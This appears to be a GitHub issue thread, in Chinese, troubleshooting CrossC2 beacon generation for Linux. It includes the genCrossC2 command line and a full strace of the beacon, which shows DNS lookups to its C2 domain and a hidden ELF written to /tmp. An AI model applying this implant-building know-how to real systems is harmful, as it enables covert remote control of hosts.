linux-64下生成带有重绑定库的libbeacon运行错误

[ghost]

./genCrossC2.Linux xxx.com 443 ./.cobaltstrike.beacon_keys ./lib_rebind_cdn.so Linux x64 /tmp/xxxx
用最新的3.0.1的版本，一运行，就提示[error]: write dll
这是为什么呢
能否把这错误提示去掉，cs能正常上线

如果生成的是Linux-lib，上线不了，提示：
[error]: write dll
[error]: [parse lib]: /tmp/.sys.rrcache.data: file too short!
[error]: write dll
[error]: [parse lib]: ./.sys.rrcache.data: file too short!
[error]: [parse symbol]: (null)!

[gloxec]

一运行，就提示[error]: write dll 这是为什么呢 能否把这错误提示去掉，cs能正常上线

因为beacon内置了多种环境下的上线方案，会轮循尝试。当某种方案失败时就会报错提示失败的方式，例入你写的linux-lib上线输出。所以这里出现错误但能上线是正常的。

能否把这错误提示去掉

后期可以考虑将该阶段的错误信息加入Debug状态下，默认将不输出

如果生成的是Linux-lib，上线不了

麻烦贴下Linux uname -e信息，以及strace -ff -o res.txt xxxxxxxx收集下运行过程。

[ghost]

[root@localhost tmp]# uname -a
Linux localhost.localdomain 3.10.0-1127.el7.x86_64 #1 SMP Tue Mar 31 23:36:51 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
[root@localhost tmp]# strace -ff -o res.txt ./test
Hello.
[error]: write dll
[error]: [parse lib]: /tmp/.sys.rrcache.data: file too short!
[error]: write dll
[error]: [parse lib]: ./.sys.rrcache.data: file too short!
[error]: [parse symbol]: (null)!
^C
[root@localhost tmp]# cat res.txt.902
res.txt.9023 res.txt.9024
[root@localhost tmp]# cat res.txt.9023
execve("./test", ["./test"], 0x7ffe70f5a678 /* 22 vars /) = 0
brk(NULL) = 0x820000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fed3bd82000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (没有那个文件或目录)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=52969, ...}) = 0
mmap(NULL, 52969, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fed3bd75000
close(3) = 0
open("/lib64/libdl.so.2", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0P\16\0\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=19248, ...}) = 0
mmap(NULL, 2109744, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fed3b95e000
mprotect(0x7fed3b960000, 2097152, PROT_NONE) = 0
mmap(0x7fed3bb60000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x2000) = 0x7fed3bb60000
close(3) = 0
open("/lib64/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0`&\2\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=2156352, ...}) = 0
mmap(NULL, 3985920, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fed3b590000
mprotect(0x7fed3b754000, 2093056, PROT_NONE) = 0
mmap(0x7fed3b953000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1c3000) = 0x7fed3b953000
mmap(0x7fed3b959000, 16896, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fed3b959000
close(3) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fed3bd74000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fed3bd72000
arch_prctl(ARCH_SET_FS, 0x7fed3bd72740) = 0
mprotect(0x7fed3b953000, 16384, PROT_READ) = 0
mprotect(0x7fed3bb60000, 4096, PROT_READ) = 0
mprotect(0x600000, 4096, PROT_READ) = 0
mprotect(0x7fed3bd83000, 4096, PROT_READ) = 0
munmap(0x7fed3bd75000, 52969) = 0
brk(NULL) = 0x820000
brk(0x841000) = 0x841000
brk(NULL) = 0x841000
open("/tmp/mycs_cdn.so", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\231\3\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=2737760, ...}) = 0
mmap(NULL, 2719640, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fed3b2f8000
mprotect(0x7fed3b331000, 2281472, PROT_NONE) = 0
mmap(0x7fed3b331000, 1789952, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x39000) = 0x7fed3b331000
mmap(0x7fed3b4e6000, 487424, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1ee000) = 0x7fed3b4e6000
mmap(0x7fed3b55e000, 192512, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x265000) = 0x7fed3b55e000
mmap(0x7fed3b58d000, 12184, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fed3b58d000
mprotect(0x7fed3bd83000, 3556, PROT_READ|PROT_WRITE) = 0
mprotect(0x7fed3bd83000, 3556, PROT_READ) = 0
mprotect(0x7ffd9ebf4000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC|PROT_GROWSDOWN) = 0
close(3) = 0
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=52969, ...}) = 0
mmap(NULL, 52969, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fed3bd75000
close(3) = 0
open("/lib64/librt.so.1", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0000"\0\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=43712, ...}) = 0
mmap(NULL, 2128952, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fed3b0f0000
mprotect(0x7fed3b0f7000, 2093056, PROT_NONE) = 0
mmap(0x7fed3b2f6000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x6000) = 0x7fed3b2f6000
close(3) = 0
open("/lib64/libpthread.so.0", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\200m\0\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=142144, ...}) = 0
mmap(NULL, 2208904, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fed3aed4000
mprotect(0x7fed3aeeb000, 2093056, PROT_NONE) = 0
mmap(0x7fed3b0ea000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x16000) = 0x7fed3b0ea000
mmap(0x7fed3b0ec000, 13448, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fed3b0ec000
close(3) = 0
mprotect(0x7fed3b0ea000, 4096, PROT_READ) = 0
mprotect(0x7fed3b2f6000, 4096, PROT_READ) = 0
set_tid_address(0x7fed3bd72a10) = 9023
set_robust_list(0x7fed3bd72a20, 24) = 0
rt_sigaction(SIGRTMIN, {sa_handler=0x7fed3aeda860, sa_mask=[], sa_flags=SA_RESTORER|SA_SIGINFO, sa_restorer=0x7fed3aee3630}, NULL, 8) = 0
rt_sigaction(SIGRT_1, {sa_handler=0x7fed3aeda8f0, sa_mask=[], sa_flags=SA_RESTORER|SA_RESTART|SA_SIGINFO, sa_restorer=0x7fed3aee3630}, NULL, 8) = 0
rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0
getrlimit(RLIMIT_STACK, {rlim_cur=81921024, rlim_max=RLIM64_INFINITY}) = 0
mmap(NULL, 8392704, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_STACK, -1, 0) = 0x7fed3a6d3000
mprotect(0x7fed3a6d3000, 4096, PROT_NONE) = 0
clone(child_stack=0x7fed3aed2fb0, flags=CLONE_VM|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_THREAD|CLONE_SYSVSEM|CLONE_SETTLS|CLONE_PARENT_SETTID|CLONE_CHILD_CLEARTID, parent_tidptr=0x7fed3aed39d0, tls=0x7fed3aed3700, child_tidptr=0x7fed3aed39d0) = 9024
munmap(0x7fed3bd75000, 52969) = 0
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fed3bd81000
write(1, "Hello.\n", 7) = 7
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigaction(SIGCHLD, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
nanosleep({tv_sec=1000, tv_nsec=0}, {tv_sec=990, tv_nsec=708934323}) = ? ERESTART_RESTARTBLOCK (Interrupted by signal)
--- SIGINT {si_signo=SIGINT, si_code=SI_KERNEL} ---
+++ killed by SIGINT +++
[root@localhost tmp]# cat res.txt.9024
set_robust_list(0x7fed3aed39e0, 24) = 0
rt_sigaction(SIGHUP, {sa_handler=0x7fed3b3bdec0, sa_mask=[HUP], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7fed3b5c6400}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGCHLD, {sa_handler=SIG_IGN, sa_mask=[CHLD], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7fed3b5c6400}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
mmap(NULL, 134217728, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_NORESERVE, -1, 0) = 0x7fed326d3000
munmap(0x7fed326d3000, 26398720) = 0
munmap(0x7fed38000000, 40710144) = 0
mprotect(0x7fed34000000, 135168, PROT_READ|PROT_WRITE) = 0
open("/tmp/mycs_cdn.so", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0755, st_size=2737760, ...}) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fed3bd80000
fstat(3, {st_mode=S_IFREG|0755, st_size=2737760, ...}) = 0
lseek(3, 2736128, SEEK_SET) = 2736128
read(3, "L\0\0\0\0\0\0\0\3\0\0\0\0\0\0\0\10\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"..., 1632) = 1632
mmap(NULL, 2740224, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fed3a436000
lseek(3, 0, SEEK_SET) = 0
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\231\3\0\0\0\0\0"..., 2736128) = 2736128
read(3, "L\0\0\0\0\0\0\0\3\0\0\0\0\0\0\0\10\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"..., 4096) = 1632
close(3) = 0
munmap(0x7fed3bd80000, 4096) = 0
stat("/etc/resolv.conf", {st_mode=S_IFREG|0644, st_size=97, ...}) = 0
open("/etc/host.conf", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=9, ...}) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fed3bd80000
read(3, "multi on\n", 4096) = 9
read(3, "", 4096) = 0
close(3) = 0
munmap(0x7fed3bd80000, 4096) = 0
futex(0x7fed3b95b9f0, FUTEX_WAKE_PRIVATE, 2147483647) = 0
open("/etc/resolv.conf", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=97, ...}) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fed3bd80000
read(3, "# Generated by NetworkManager\nna"..., 4096) = 97
access("/proc/net", R_OK) = 0
access("/proc/net/unix", R_OK) = 0
socket(AF_UNIX, SOCK_DGRAM|SOCK_CLOEXEC, 0) = 4
ioctl(4, SIOCGIFINDEX, {ifr_name="ens33", }) = 0
close(4) = 0
read(3, "", 4096) = 0
close(3) = 0
munmap(0x7fed3bd80000, 4096) = 0
uname({sysname="Linux", nodename="localhost.localdomain", ...}) = 0
socket(AF_UNIX, SOCK_STREAM|SOCK_CLOEXEC|SOCK_NONBLOCK, 0) = 3
connect(3, {sa_family=AF_UNIX, sun_path="/var/run/nscd/socket"}, 110) = -1 ENOENT (没有那个文件或目录)
close(3) = 0
socket(AF_UNIX, SOCK_STREAM|SOCK_CLOEXEC|SOCK_NONBLOCK, 0) = 3
connect(3, {sa_family=AF_UNIX, sun_path="/var/run/nscd/socket"}, 110) = -1 ENOENT (没有那个文件或目录)
close(3) = 0
open("/etc/nsswitch.conf", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=1949, ...}) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fed3bd80000
read(3, "#\n# /etc/nsswitch.conf\n#\n# An ex"..., 4096) = 1949
read(3, "", 4096) = 0
close(3) = 0
munmap(0x7fed3bd80000, 4096) = 0
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=52969, ...}) = 0
mmap(NULL, 52969, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fed3bd65000
close(3) = 0
open("/lib64/libnss_files.so.2", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\260!\0\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=61560, ...}) = 0
mmap(NULL, 2173048, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fed3a223000
mprotect(0x7fed3a22f000, 2093056, PROT_NONE) = 0
mmap(0x7fed3a42e000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0xb000) = 0x7fed3a42e000
mmap(0x7fed3a430000, 22648, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fed3a430000
close(3) = 0
mprotect(0x7fed3a42e000, 4096, PROT_READ) = 0
munmap(0x7fed3bd65000, 52969) = 0
open("/etc/hosts", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=201, ...}) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fed3bd80000
read(3, "127.0.0.1 localhost localhost."..., 4096) = 201
read(3, "", 4096) = 0
close(3) = 0
munmap(0x7fed3bd80000, 4096) = 0
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=52969, ...}) = 0
mmap(NULL, 52969, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fed3bd65000
close(3) = 0
open("/lib64/libnss_dns.so.2", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\240\20\0\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=31344, ...}) = 0
mmap(NULL, 2121984, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fed3a01c000
mprotect(0x7fed3a022000, 2093056, PROT_NONE) = 0
mmap(0x7fed3a221000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x5000) = 0x7fed3a221000
close(3) = 0
open("/lib64/libresolv.so.2", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\2009\0\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=109976, ...}) = 0
mmap(NULL, 2202112, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fed39e02000
mprotect(0x7fed39e18000, 2097152, PROT_NONE) = 0
mmap(0x7fed3a018000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x16000) = 0x7fed3a018000
mmap(0x7fed3a01a000, 6656, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fed3a01a000
close(3) = 0
mprotect(0x7fed3a018000, 4096, PROT_READ) = 0
mprotect(0x7fed3a221000, 4096, PROT_READ) = 0
munmap(0x7fed3bd65000, 52969) = 0
socket(AF_INET, SOCK_DGRAM|SOCK_CLOEXEC|SOCK_NONBLOCK, IPPROTO_IP) = 3
setsockopt(3, SOL_IP, IP_RECVERR, [1], 4) = 0
connect(3, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("192.168.132.1")}, 16) = 0
poll([{fd=3, events=POLLOUT}], 1, 0) = 1 ([{fd=3, revents=POLLOUT}])
sendto(3, "\263\245\1\0\0\1\0\0\0\0\0\0\10linuxrpm\3xyz\0\0\1\0\1", 30, MSG_NOSIGNAL, NULL, 0) = 30
poll([{fd=3, events=POLLIN}], 1, 5000) = 1 ([{fd=3, revents=POLLIN}])
ioctl(3, FIONREAD, [62]) = 0
recvfrom(3, "\263\245\201\200\0\1\0\2\0\0\0\0\10linuxrpm\3xyz\0\0\1\0\1\300\f"..., 1024, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("192.168.132.1")}, [28->16]) = 62
close(3) = 0
munmap(0x7fed3a436000, 2740224) = 0
open("/tmp/mycs_cdn.so", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0755, st_size=2737760, ...}) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fed3bd80000
fstat(3, {st_mode=S_IFREG|0755, st_size=2737760, ...}) = 0
lseek(3, 2736128, SEEK_SET) = 2736128
read(3, "L\0\0\0\0\0\0\0\3\0\0\0\0\0\0\0\10\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"..., 1632) = 1632
mprotect(0x7fed34021000, 2617344, PROT_READ|PROT_WRITE) = 0
lseek(3, 0, SEEK_SET) = 0
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\231\3\0\0\0\0\0"..., 2736128) = 2736128
read(3, "L\0\0\0\0\0\0\0\3\0\0\0\0\0\0\0\10\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"..., 4096) = 1632
close(3) = 0
munmap(0x7fed3bd80000, 4096) = 0
uname({sysname="Linux", nodename="localhost.localdomain", ...}) = 0
unlink("/tmp/.sys.rrcache.data") = -1 ENOENT (没有那个文件或目录)
open("/tmp/.sys.rrcache.data", O_WRONLY|O_CREAT, 0777) = 3
write(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0P\10\0\0\0\0\0\0"..., 139968689221944) = -1 EFAULT (错误的地址)
write(1, "[error]: write dll\n", 19) = 19
close(3) = 0
chmod("/tmp/.sys.rrcache.data", 0777) = 0
open("/tmp/.sys.rrcache.data", O_RDONLY|O_CLOEXEC) = 3
read(3, "", 832) = 0
close(3) = 0
write(1, "[error]: [parse lib]: /tmp/.sys."..., 62) = 62
unlink("/tmp/.sys.rrcache.data") = 0
unlink("./.sys.rrcache.data") = -1 ENOENT (没有那个文件或目录)
open("./.sys.rrcache.data", O_WRONLY|O_CREAT, 0777) = 3
write(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0P\10\0\0\0\0\0\0"..., 139968689221944) = -1 EFAULT (错误的地址)
write(1, "[error]: write dll\n", 19) = 19
close(3) = 0
chmod("./.sys.rrcache.data", 0777) = 0
open("./.sys.rrcache.data", O_RDONLY|O_CLOEXEC) = 3
read(3, "", 832) = 0
close(3) = 0
write(1, "[error]: [parse lib]: ./.sys.rrc"..., 59) = 59
unlink("./.sys.rrcache.data") = 0
write(1, "[error]: [parse symbol]: (null)!"..., 33) = 33
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=52969, ...}) = 0
mmap(NULL, 52969, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fed3bd65000
close(3) = 0
open("/lib64/libgcc_s.so.1", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\320*\0\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=88720, ...}) = 0
mmap(NULL, 2184192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fed3a4bd000
mprotect(0x7fed3a4d2000, 2093056, PROT_NONE) = 0
mmap(0x7fed3a6d1000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x14000) = 0x7fed3a6d1000
close(3) = 0
mprotect(0x7fed3a6d1000, 4096, PROT_READ) = 0
munmap(0x7fed3bd65000, 52969) = 0
madvise(0x7fed3a6d3000, 8368128, MADV_DONTNEED) = 0
exit(0) = ?
+++ exited with 0 +++
[root@localhost tmp]#

[gloxec]

麻烦测试下该版的Linux-lib (删除zip后缀即可)
genCrossC2.Linux.removeZIP.zip